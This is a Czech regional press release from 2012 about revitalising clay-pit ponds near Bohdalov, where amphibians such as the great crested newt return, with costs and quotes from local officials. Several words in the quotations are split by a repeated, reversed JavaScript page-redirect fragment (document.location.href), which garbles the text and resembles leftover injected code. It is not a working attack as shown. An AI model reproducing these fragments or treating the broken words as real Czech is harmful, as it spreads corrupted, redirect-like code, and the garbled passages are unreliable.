Bohdalov, bohdalov, aktuality, tůně
Rainbow page separator

Do tůní u Bohdalova se vrací život

Středa, 30. května 2012

Bohdalov /Po dvou letech revitalizačních prací se v jezírkách nedaleko obce Bohdalova na Žďársku objevují původní živočichové. Do upravené soustavy čtyř lagun o rozloze 1,5 hektaru se vrací původní vzácní obyvatelé jako je například čolek velký nebo kuňka obecná. Díky terénním úpravám došlo ke zpevnění břehů a vytvoření systému kanálů, které umožňují snadnější migraci ohrožených druhů mezi jezírky. Celkové náklady by neměly přesáhnout dva miliony korun. „Kraj Vysočina uhradí deset procent z celkových nákladů, maximálně však do výše 200 tisíc korun. Zbylých devadesát procent pokryjí finanční prostředky z Operačníhoprogramu životního prostředí,“ okomen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toval Zdeněk Ryšavý, radní Kraje Vysočina pro oblast životního prostředí.

„Tůně v blízkosti obchvatu u Bohdalova vznikly v minulosti těžbou cihlářské hlíny. Po dobu několika let docházelo k zarůstání, sesuvům břehům a postupnému vysychání jezírek. Pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to se Kraj Vysočina rozhodl poskytnout finanční prostředky pro zachování [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to dnes už chráněné území a předat přírodní bohatství budoucím generacím,“ uvedl radní Zdeněk Ryšavý, který dnes zrevitalizované území navštívil a společně se žáky základní školy z Bohdalova se zúčastnil odborného výkladu o tamějších živočiších od zástupců Agentury ochrany přírody. „Původně se v tůních vysky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovalo celkem 12 druhů obojživelníků z celkových 15 žijících v Kraji Vysočina, což dodává místu výjimečnou prioritu. Z těch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to důvodů se uskutečnily úpravy ve dvou fázích tak, aby nedošlo k výraznému narušení koloběhu života v tůních,“ uzavřel Tomáš Blažek ze Sdružení Krajina, která má danou oblast ve svém vlastnictví.

TZ Kraje Vysočina